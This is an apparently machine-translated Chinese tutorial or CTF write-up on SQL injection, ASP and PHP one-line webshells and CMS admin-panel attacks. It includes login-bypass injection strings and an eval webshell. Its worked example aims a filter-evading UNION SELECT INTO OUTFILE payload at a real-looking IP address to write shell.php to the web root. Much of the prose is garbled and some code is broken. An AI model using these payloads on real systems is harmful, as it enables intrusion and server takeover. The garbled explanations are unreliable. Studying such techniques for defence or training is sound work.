sql injection:
* SQL injection is a method of adding the SQL code to input parameters, is transmitted to the server parse and execute one of attack.
* SQL injection attacks is unfiltered input parameters, and then stitching them directly into the SQL statement parsing, an act beyond the reach of the anticipated execution, called SQL injection attacks.
SQL injection attacks:
(1) Digital injection:
In the browser address bar: learn.me/sql/article.php id = 1, this request is equivalent to calling a query?:
$sql = "SELECT * FROM article WHERE id =",$id
Normal circumstances returns id = Article 1, if the browser input: learn.me/sql/article.php id = -1 OR 1 = 1?
This is a sql injection attack, it may return information article.
(2) injection string:
There is usually a platform for user login, you need to enter the correct account number and password to log in into
Because the user name and password are strings, so SQL injection is the method parameter data carried it becomes a string of comments in mysql
'#' And '-': If you enter user = user '#, casually enter a password 111, which is equivalent username =' user '#' and password = '111' but is seen as a comment after # is ignored
'-' The same can be seen behind the comment portion, so this is equivalent to a part of the wrong password or does not directly enter the password can log back.
'Or1 = 1 #' we usually use is equivalent to a condition where, because 1 = 1 is always set up, so where this sentence is true.
Weak password: it refers to a simple password as the password is easy to crack 123 or the like
Trojan sentence:
<% execute request ( "value" )%>
where value is the value, so you can change your values, in front of the request is to get the value
<% eval request ( "value" )%> ( now more common, but less characters to form words have special restrictions where practical)
when you know the URL of the database, you can use a local web connection to get Webshell. (Do not know the database can, just know that <% eval request ( "value" )%> This file is inserted where an ASP file inside it.
For the environment:
2. database address and database format known as asp or asa
3. In the case of database format is not asp or asa, if a word can be inserted into asp file.
CMS vulnerabilities:
The purpose of solving such practice is generally applicable environmental step
1. Background scanned by a tool (Sword, d shields)
Usually / admin or the like /wp-login.php
2. Locate the background after landing, to get the administrator account and password
Try sql injection, weak passwords blasting
3. After landing into a word Trojan upload, re-use links to find the chopper flag in the root directory
Example: given a URL: http: //219.153.49.228: 44930
Let's Sword by scanning the background
Found a backstage visit the Web site administrator
Then we test sql injection
1 enters the account number 'database operation fails, the present injection site is displayed.
Account input 1'and'1 '='. 1 , and then return to the normal login screen, that is the injection character, guess field.
账号输入1’order by 5#说明是#注释(ORDER BY句子用于对查询结果集进行排序,ORDER BY中每个表达式由列名或列序号(从1开始)组成。)
然后使用bp构造一句话语句
1' uni union on selselectect ‘<%php @eval($_POST[‘cmd’])?>’,2,3,4,5 in into outoutfilefile '/var/www/html/shell.php'#
将其16进制转化写进去,连接菜刀发现在根目录里